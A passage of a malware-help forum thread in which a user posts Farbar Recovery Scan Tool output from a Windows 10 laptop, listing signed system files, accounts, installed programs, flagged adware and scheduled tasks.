C:\Users\Lexi\AppData\Local\Temp\sqlite-3.7.2-sqlitejdbc.dll


==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2016-03-07 13:33

==================== End of FRST.txt ============================

Link to post
Share on other sites

Addition.txt

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
Ran by Lexi (2016-03-08 22:57:17)
Running from C:\Users\Lexi\Downloads
Windows 10 Home (X64) (2015-08-28 01:39:17)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-2574262253-2623044021-4024016403-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-2574262253-2623044021-4024016403-503 - Limited - Disabled)
Guest (S-1-5-21-2574262253-2623044021-4024016403-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2574262253-2623044021-4024016403-1002 - Limited - Enabled)
Lexi (S-1-5-21-2574262253-2623044021-4024016403-1001 - Administrator - Enabled) => C:\Users\Lexi

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

ABBYY FineReader for ScanSnap 4.1 (HKLM-x32\...\{FB400000-0002-0000-0000-074957833700}) (Version: 8.02.380.7259 - ABBYY)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 18.0.0.144 - Adobe Systems Incorporated)
Adobe Digital Editions (HKLM-x32\...\Digital Editions) (Version:  - )
Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.306 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.14) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.14 - Adobe Systems Incorporated)
Amazon Cloud Drive (HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\23ab716f18849b6f) (Version: 2.1.2013.1340 - Amazon)
Amazon Kindle (HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Amazon Kindle) (Version:  - Amazon)
Amazon Links (HKLM-x32\...\{3135D885-9D9A-4B4D-8D45-9DB05DA115CA}) (Version: 2.02 - TOSHIBA Corporation)
Amazon MP3 Downloader 1.0.17 (HKLM-x32\...\Amazon MP3 Downloader) (Version: 1.0.17 - Amazon Services LLC)
Amazon Unbox Video (HKLM-x32\...\InstallShield_{54A4839E-87F8-4BD1-9682-A349E9943F0A}) (Version: 2.2.0.153 - Amazon.com)
Amazon Unbox Video (x32 Version: 2.2.0.153 - Amazon.com) Hidden
Apple Application Support (HKLM-x32\...\{B3575D00-27EF-49C2-B9E0-14B3D954E992}) (Version: 1.5.2 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{439760BC-7737-4386-9B1D-A90A3E8A22EA}) (Version: 3.4.1.2 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Application X (HKLM-x32\...\Application X1.0) (Version:  - )
Audible Download Manager (HKLM-x32\...\AudibleDownloadManager) (Version: 6.6.0.12 - Audible, Inc.)
AudibleManager (HKLM-x32\...\AudibleManager) (Version: 1637796.2002539448.1402252320.32 - Audible, Inc.)
Avidemux 2.6 - 32 bits (32-bit) (HKLM-x32\...\Avidemux 2.6 - 32 bits) (Version: 2.6.9.00 - )
Bejeweled 2 Deluxe (x32 Version: 2.2.0.82 - WildTangent) Hidden
Belarc Advisor 8.3 (HKLM-x32\...\Belarc Advisor) (Version: 8.3.2.0 - Belarc Inc.)
BodyMedia SYNC (HKLM-x32\...\InstallShield_{99567851-B7F1-4692-A33A-0732E761220B}) (Version: 2.3.0.98 - BodyMedia, Inc.)
BodyMedia SYNC (x32 Version: 2.3.0.98 - BodyMedia, Inc.) Hidden
Bonjour (HKLM\...\{CA0D2F09-F811-48D4-843E-C87696C6A9D9}) (Version: 3.0.0.2 - Apple Inc.)
Brother MFL-Pro Suite MFC-685CW (HKLM-x32\...\{A3FEC306-FBFF-4B0D-95B9-F9C67C65079E}) (Version: 1.0.2.0 - Brother Industries, Ltd.)
CardMinder (HKLM-x32\...\{D4F2AFD3-0167-4464-B92F-78AB6DA8A0AA}) (Version: V4.1L10 - PFU)
CardMinder V4.1 (x32 Version: 4.1.10.1 - PFU) Hidden
Chuzzle Deluxe (x32 Version: 2.2.0.82 - WildTangent) Hidden
Codecs for Windows 7 Pack 4.0.5 (HKLM-x32\...\Codecs for Windows 7 Pack) (Version: 4.0.5 - Codecs for Windows 7 Pack)
Compatibility Pack for the 2007 Office system (HKLM-x32\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Coupon Printer for Windows (HKLM-x32\...\Coupon Printer for Windows5.0.0.3) (Version: 5.0.0.3 - Coupons.com Incorporated)
Cozi • FlyLady Edition (HKLM-x32\...\{6A40DDB9-D7B7-4C7E-9951-E3E8DE8A6B27}) (Version: 1.0.6029.37342 - Cozi Group, Inc.)
Craft ROBO Controller (HKLM-x32\...\{97D52BC9-D904-413F-A0F7-E3EE4C95B623}) (Version: 5.01 - Graphtec)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DLL Opener (HKLM-x32\...\DLL Opener) (Version: 0.1 - )
Duplicate Cleaner 2.0.6 (HKLM-x32\...\Duplicate Cleaner) (Version: 2.0.6 - DigitalVolcano)
Easy Thumbnails (Remove only) (HKLM-x32\...\Easy Thumbnails_is1) (Version: 3.0 - Fookes Software)
eDoc Organizer (HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\fe1b84459eb7239d) (Version: 3.5.2.0 - eDoc LLC)
Escape Rosecliff Island (x32 Version: 2.2.0.82 - WildTangent) Hidden
Evernote v. 5.9.6 (HKLM-x32\...\{A542D366-9877-11E5-B101-005056951CAD}) (Version: 5.9.6.9494 - Evernote Corp.)
Family Tree Maker 2012 (HKLM-x32\...\Family Tree Maker 2012) (Version: 21.0.388 - Ancestry.com, Inc.)
Family Tree Maker 2012 (x32 Version: 21.0.388 - Ancestry.com, Inc.) Hidden
Fast Free Converter (HKLM-x32\...\Fast Free Converter) (Version: 4.1 - Fast Free Converter)
FATE - The Traitor Soul (x32 Version: 2.2.0.82 - WildTangent) Hidden
FileThis Fetch (HKLM-x32\...\{C087314D-EBFD-45B4-8073-A2D6592A4EE2}) (Version: 1.1.22 - FileThis)
Foxit Reader (HKLM-x32\...\Foxit Reader_is1) (Version: 5.4.5.124 - Foxit Corporation)
Free AVI MPEG WMV MP4 FLV Video Joiner 8.7.1 (HKLM-x32\...\Free AVI MPEG WMV MP4 FLV Video Joiner_is1) (Version:  - FreeAudioVideoSoftTech, Inc.)
Garmin POI Loader (HKLM-x32\...\{4AF7F4F9-AEFE-4183-B333-BEDDD193339A}) (Version: 2.7.1 - Garmin Ltd or its subsidiaries)
Garmin USB Drivers (HKLM-x32\...\{3D5D6CFC-3097-425A-8D8F-7EAF5D57641D}) (Version: 2.3.1.0 - Garmin Ltd or its subsidiaries)
Garmin WebUpdater (HKLM-x32\...\{00FE2935-FB56-4410-AB5F-D6E70C1771D2}) (Version: 2.5.6 - Garmin Ltd or its subsidiaries)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.116 - Google Inc.)
Google Earth Plug-in (HKLM-x32\...\{4AB54F11-2F8C-11E3-B09F-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)
Google Gears (HKLM-x32\...\{2FA41EBB-3F5A-35C3-85D6-51EC72A11FBD}) (Version: 0.5.3600 - Google)
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.7210.1528 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
HandBrake 0.9.8 (HKLM-x32\...\HandBrake) (Version: 0.9.8 - )
Helium (HKLM-x32\...\{9A781940-AC41-4D5E-8E1E-76A04B916FB9}) (Version: 1.0.0 - ClockworkMod)
Intel Driver Update Utility (HKLM-x32\...\{ca4bc3a8-b99c-4416-90d8-351a8ceab458}) (Version: 2.2.0.2 - Intel)
Intel® Driver Update Utility 2.2 (x32 Version: 2.2.0.1 - Intel) Hidden
Intel® Graphics Media Accelerator Driver (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2119 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 6.0.0.1179 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 9.5.7.1002 - Intel Corporation)
Itibiti RTC (x32 Version: 0.0.1 - Itibiti Inc) Hidden
iTunes (HKLM\...\{997C9EC4-B53D-479D-81B7-0AEC8D174BA1}) (Version: 10.4.1.10 - Apple Inc.)
Java 7 Update 25 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86417025FF}) (Version: 7.0.250 - Oracle)
Java 6 Update 17 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83216017FF}) (Version: 6.0.170 - Sun Microsystems, Inc.)
JavaFX 2.1.1 (HKLM-x32\...\{1111706F-666A-4037-7777-211328764D10}) (Version: 2.1.1 - Oracle Corporation)
Jewel Quest 3 (x32 Version: 2.2.0.82 - WildTangent) Hidden
JMicron Flash Media Controller Driver (HKLM-x32\...\{26604C7E-A313-4D12-867F-7C6E7820BE4C}) (Version: 1.0.44.1 - JMicron Technology Corp.)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Keyboarding Without Tears (HKLM-x32\...\Keyboarding-Without-Tears) (Version: 1.0 - UNKNOWN)
Keyboarding Without Tears (x32 Version: 1.0 - UNKNOWN) Hidden
Label@Once 1.0 (HKLM-x32\...\{0D795777-9D60-4692-8386-F2B3F2B5E5BF}) (Version: 1.0 - Corel)
LeapFrog Connect (HKLM-x32\...\UPCShell) (Version: 6.0.19.19317 - LeapFrog)
LeapFrog Connect (x32 Version: 6.0.19.19317 - LeapFrog) Hidden
LeapFrog Leapster Explorer Plugin (x32 Version: 6.0.19.19317 - LeapFrog) Hidden
LeapFrog My Pals Plugin (x32 Version: 6.0.19.19317 - LeapFrog) Hidden
LeapFrog MyOwnStoryTimePad Plugin (x32 Version: 6.0.19.19317 - LeapFrog) Hidden
LeapFrog Tag Junior Plugin (x32 Version: 6.0.19.19317 - LeapFrog) Hidden
LeapFrog Tag Plugin (x32 Version: 6.0.19.19317 - LeapFrog) Hidden
LG Verizon United Drivers (HKLM-x32\...\{885DBC42-4BCC-4A7E-9F2B-64B25E02E926}) (Version: 2.6.0 - LG Electronics)
Microsoft Office Home and Student 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Office PowerPoint Viewer 2007 (English) (HKLM-x32\...\{95120000-00AF-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Suite Activation Assistant (HKLM-x32\...\{E50AE784-FABE-46DA-A1F8-7B6B56DCB22E}) (Version: 2.9 - Microsoft Corporation)
Microsoft Picture It! Photo Premium 9 (HKLM-x32\...\PictureIt_v9) (Version: 9.0.0.0000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x64 9.0.30729.5570 (HKLM\...\{8338783A-0968-3B85-AFC7-BAAE0A63DC50}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM-x32\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Works (HKLM-x32\...\{15BC8CD0-A65B-47D0-A2DD-90A824590FA8}) (Version: 9.7.0621 - Microsoft Corporation)
MixiDJ V46 Toolbar (HKLM-x32\...\MixiDJ_V46 Toolbar) (Version: 6.13.3.1 - MixiDJ V46) <==== ATTENTION
MotoHelper MergeModules (x32 Version: 1.0.0 - Motorola) Hidden
Mozilla Firefox 44.0.2 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 44.0.2 (x86 en-US)) (Version: 44.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 44.0.2.5884 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
OverDrive Media Console (HKLM-x32\...\{D07205E7-F6D3-4333-AFCC-782A07685B72}) (Version: 3.2.20 - OverDrive, Inc.)
Penguins! (x32 Version: 2.2.0.82 - WildTangent) Hidden
PlayReady PC Runtime amd64 (HKLM\...\{BCA9334F-B6C9-4F65-9A73-AC5A329A4D04}) (Version: 1.3.0 - Microsoft Corporation)
PlayReady PC Runtime x86 (HKLM-x32\...\{CCA5EAAD-92F4-4B7A-B5EE-14294C66AB61}) (Version: 1.3.0 - Microsoft Corporation)
Polar Bowler (x32 Version: 2.2.0.82 - WildTangent) Hidden
Quick Web Player (HKLM-x32\...\{739126B3-1B80-4F9F-8D59-312A19633E1A}_is1) (Version:  - )
QuickTime (HKLM-x32\...\{C9E14402-3631-4182-B377-6B0DFB1C0339}) (Version: 7.70.80.34 - Apple Inc.)
Realtek Ethernet Controller Driver For Windows 7 (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.20.503.2010 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7572 - Realtek Semiconductor Corp.)
Realtek WLAN Driver (HKLM-x32\...\{9D3D8C60-A55F-4fed-B2B9-173001290E16}) (Version: 2.00.0013 - REALTEK Semiconductor Corp.)
ROBO Master (HKLM-x32\...\{44E8FA6E-931D-4755-82DA-DB93CE1F238C}) (Version: 5.10.0 - Graphtec)
ScanSnap (x32 Version: 5.1.11.1 - PFU Limited) Hidden
ScanSnap (x32 Version: 5.1.62.2 - PFU Limited) Hidden
ScanSnap Manager (HKLM-x32\...\{DBCDB997-EEEB-4BE9-BAFF-26B4094DBDE6}) (Version: V5.1L62 - PFU)
ScanSnap Organizer (HKLM-x32\...\{E58F3B88-3B3E-4F85-9323-04789D979C15}) (Version: V4.1L11 - PFU)
ScanSnap Organizer (x32 Version: 4.1.11.18 - PFU LIMITED) Hidden
Scholastic eReader Support Files (HKLM-x32\...\{0DBAE82C-E2D0-418E-8DA2-4D2F54CC1C58}) (Version: 1.1.4246 - Scholastic)
Screen Recorder Launcher (HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\ScreenRecorderLauncher) (Version: 2.0 - )
Secure Online Account Numbers (HKLM-x32\...\{65980EBF-C4B5-4555-823A-94DB7F709E53}) (Version: 2.3.14.0 - Discover)
Secure Online Account Numbers (x32 Version: 2.0.2.0 - Discover) Hidden
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
Shop'NCook Menu version 4.0.14 (HKLM-x32\...\{7B2A623E-AF79-4C51-9843-62C0C5D45F74}_is1) (Version: 4.0.14 - Rufenacht Innovative)
Shop'NCook Reader version 4.0.16 (HKLM-x32\...\{4F741F80-FCCF-4D9D-AADF-EF010DBABD49}_is1) (Version: 4.0.16 - Rufenacht Innovative)
SimpleOCR 3.1 (HKLM-x32\...\SimpleOCR 3.1) (Version:  - )
Skitch (HKLM-x32\...\Skitch 2.3.0.10) (Version: 2.3.0.10 - Evernote Corp.)
Skype Launcher (HKLM-x32\...\{DA84ECBF-4B79-47F2-B34C-95C38484C058}) (Version: 2.01 - TOSHIBA Corporation)
Skype Toolbars (HKLM-x32\...\{CD95D125-2992-4858-B3EF-5F6FB52FBAD6}) (Version: 5.0.4137 - Skype Technologies S.A.)
Skype™ 7.0 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.0.102 - Skype Technologies S.A.)
Storia (HKLM-x32\...\{D74EB870-4745-467B-9430-DA53A604A456}) (Version: 1.1.4246 - Scholastic)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.10.0 - Synaptics Incorporated)
TOSHIBA Application Installer (HKLM-x32\...\{970472D0-F5F9-4158-A6E3-1AE49EFEF2D3}) (Version: 9.0.1.1 - TOSHIBA)
TOSHIBA Assist (HKLM-x32\...\{1B87C40B-A60B-4EF3-9A68-706CF4B69978}) (Version: 3.00.11 - TOSHIBA CORPORATION)
TOSHIBA Bulletin Board (HKLM-x32\...\InstallShield_{C14518AF-1A0F-4D39-8011-69BAA01CD380}) (Version: 1.6.07.64 - TOSHIBA Corporation)
TOSHIBA Disc Creator (HKLM\...\{5DA0E02F-970B-424B-BF41-513A5018E4C0}) (Version: 2.1.0.2 for x64 - TOSHIBA Corporation)
TOSHIBA DVD PLAYER (HKLM-x32\...\{6C5F3BDC-0A1B-4436-A696-5939629D5C31}) (Version: 3.01.2.12-A - TOSHIBA Corporation)
TOSHIBA eco Utility (HKLM-x32\...\InstallShield_{B3FF1CD9-B2F0-4D71-BB55-5F580401C48E}) (Version: 1.2.11.64 - TOSHIBA Corporation)
TOSHIBA Face Recognition (HKLM-x32\...\InstallShield_{F67FA545-D8E5-4209-86B1-AEE045D1003F}) (Version: 3.1.3.64 - TOSHIBA Corporation)
TOSHIBA Flash Cards Support Utility (HKLM-x32\...\InstallShield_{620BBA5E-F848-4D56-8BDA-584E44584C5E}) (Version: 1.63.0.6C - TOSHIBA CORPORATION)
TOSHIBA Hardware Setup (HKLM-x32\...\InstallShield_{5279374D-87FE-4879-9385-F17278EBB9D3}) (Version: 1.63.0.26C - TOSHIBA CORPORATION)
TOSHIBA HDD Protection (HKLM\...\{94A90C69-71C1-470A-88F5-AA47ECC96B40}) (Version: 2.2.0.4 - TOSHIBA Corporation)
TOSHIBA HDD/SSD Alert (HKLM-x32\...\InstallShield_{D4322448-B6AF-4316-B859-D8A0E84DCB38}) (Version: 3.1.64.6 - TOSHIBA Corporation)
Toshiba Laptop Checkup (HKLM-x32\...\NortonPCCheckup) (Version: 2.0.3.198 - Symantec Corporation)
TOSHIBA Media Controller (HKLM-x32\...\{983CD6FE-8320-4B80-A8F6-0D0366E0AA22}) (Version: 1.0.80.3.64 - TOSHIBA CORPORATION)
TOSHIBA Media Controller Plug-in (HKLM-x32\...\{F26FDF57-483E-42C8-A9C9-EEE1EDB256E0}) (Version: 1.0.5.10 - TOSHIBA CORPORATION)
Toshiba Online Backup (HKLM-x32\...\{C57BCDE1-7CB9-467D-B3BA-7E119916CDC1}) (Version: 1.2.0.38 - Toshiba)
TOSHIBA PC Health Monitor (HKLM\...\{9DECD0F9-D3E8-48B0-A390-1CF09F54E3A4}) (Version: 1.6.0.64 - TOSHIBA Corporation)
TOSHIBA Quality Application (HKLM-x32\...\{E69992ED-A7F6-406C-9280-1C156417BC49}) (Version: 1.0.3 - TOSHIBA)
TOSHIBA Recovery Media Creator (HKLM\...\{B65BBB06-1F8E-48F5-8A54-B024A9E15FDF}) (Version: 2.1.0.4 for x64 - TOSHIBA Corporation)
TOSHIBA ReelTime (HKLM-x32\...\InstallShield_{A0E99122-25C1-4CA4-9063-499A2A814EB6}) (Version: 1.6.06.64 - TOSHIBA Corporation)
TOSHIBA Service Station (HKLM-x32\...\{AC6569FA-6919-442A-8552-073BE69E247A}) (Version: 2.1.40 - TOSHIBA)
TOSHIBA Sleep Utility (HKLM-x32\...\{654F7484-88C5-46DC-AB32-C66BCB0E2102}) (Version: 1.4.1.1 - TOSHIBA Corporation)
TOSHIBA Supervisor Password (HKLM-x32\...\InstallShield_{51B4E156-14A5-4904-9AE4-B1AA2A0E46BE}) (Version: 1.63.0.9C - TOSHIBA CORPORATION)
TOSHIBA Value Added Package (HKLM-x32\...\InstallShield_{066CFFF8-12BF-4390-A673-75F95EFF188E}) (Version: 1.3.4.64 - TOSHIBA Corporation)
TOSHIBA Web Camera Application (HKLM-x32\...\{5E6F6CF3-BACC-4144-868C-E14622C658F3}) (Version: 1.1.1.15 - TOSHIBA Corporation)
ToshibaRegistration (HKLM-x32\...\{5AF550B4-BB67-4E7E-82F1-2C4300279050}) (Version: 1.0.4 - Toshiba)
Use the entry named LeapFrog Connect to uninstall (LeapFrog Leapster Explorer Plugin) (HKLM-x32\...\LeapsterExplorerPlugin) (Version:  - LeapFrog)
Use the entry named LeapFrog Connect to uninstall (LeapFrog My Pals Plugin) (HKLM-x32\...\MyPalsPlugin) (Version:  - LeapFrog)
Use the entry named LeapFrog Connect to uninstall (LeapFrog MyOwnStoryTimePad Plugin) (HKLM-x32\...\MyOwnStoryTimePadPlugin) (Version: 6.0.19.19317 - LeapFrog)
Use the entry named LeapFrog Connect to uninstall (LeapFrog Tag Junior Plugin) (HKLM-x32\...\TagJuniorPlugin) (Version:  - LeapFrog)
Use the entry named LeapFrog Connect to uninstall (LeapFrog Tag Plugin) (HKLM-x32\...\TagPlugin) (Version: 6.0.19.19317 - LeapFrog)
Utility Common Driver (x32 Version: 1.0.52.1C - TOSHIBA) Hidden
Virtual Families (x32 Version: 2.2.0.82 - WildTangent) Hidden
Virtual Villagers - The Secret City (x32 Version: 2.2.0.82 - WildTangent) Hidden
WildTangent Games (HKLM-x32\...\WildTangent toshiba Master Uninstall) (Version: 1.0.0.80 - WildTangent)
WildTangent ORB Game Console (x32 Version:  - WildTangent) Hidden
Windows Driver Package - Garmin (grmnusb) GARMIN Devices  (04/19/2012 2.3.1.0) (HKLM\...\98157A226B40B173301B0F53C8E98C47805D5152) (Version: 04/19/2012 2.3.1.0 - Garmin)
Windows Driver Package - LeapFrog (FlyUsb) USB  (11/05/2008 1.1.1.0) (HKLM\...\781745E87AFF80C0C1388CFF79D19ECAB2E9BB47) (Version: 11/05/2008 1.1.1.0 - LeapFrog)
Windows Driver Package - Leapfrog (Leapfrog-USBLAN) Net  (09/10/2009 02.03.05.012) (HKLM\...\8F14F2ECEDE68D26EA515B48DC25B39103C4FE8D) (Version: 09/10/2009 02.03.05.012 - Leapfrog)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3502.0922 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\...\{B10914FD-8812-47A4-85A1-50FCDE7F1F33}) (Version: 14.0.8117.416 - Microsoft Corporation)
Windows Media Encoder 9 Series (HKLM-x32\...\Windows Media Encoder 9) (Version:  - )
Zuma's Revenge (x32 Version: 2.2.0.82 - WildTangent) Hidden

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\Lexi\AppData\Roaming\Dropbox\bin\Dropbox.exe /autoplay => No File
CustomCLSID: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Lexi\AppData\Local\Microsoft\OneDrive\17.3.6301.0127\FileCoAuth.exe (Microsoft Corporation)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0055D0AD-03B3-4D48-AFE3-A38C8C677968} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {019548C8-5866-4E43-947E-549EFB0E5BF0} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {0339290B-4D0B-431D-A454-94460BABBE1F} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {03ECBFF5-C025-4739-8E50-8F4E8AEA2006} - System32\Tasks\Norton Identity Safe\Norton Error Analyzer => C:\Program Files (x86)\Norton Identity Safe\Engine\2014.7.3.12\SymErr.exe
Task: {14CBC00D-5A6F-4542-BA8F-F735F987065E} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\Windows\ehome\mcupdate.exe
Task: {18F47D62-A171-49D0-9208-AFCD563ACBDE} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\Windows\ehome\ehPrivJob.exe
Task: {20596B4E-B9FC-4C02-B636-29C81118AD7C} - System32\Tasks\{B8C8760C-1B7F-4B92-B355-EB4EBC2220B7} => C:\Program Files (x86)\Amazon\Amazon Unbox Video\ADVWindowsClientApp.exe [2011-11-24] (Amazon.com)
Task: {2A1EB5A9-CC18-47FE-8ED5-E8204F70F004} - System32\Tasks\{B28ABF54-12F8-454B-BECD-94AEA917E9D4} => pcalua.exe -a C:\Users\Lexi\Downloads\465-INST-WIN7-A.EXE -d "C:\Program Files (x86)\Mozilla Firefox"
Task: {30B217A2-ECDC-4497-B30E-BE246C50F52C} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\Windows\ehome\ehrec.exe
Task: {3181DE33-4525-4033-8EFC-B3B2A102EEB2} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\Windows\ehome\ehrec.exe
Task: {31BD4F86-0AC8-44F3-8311-6D5F6E437CE8} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
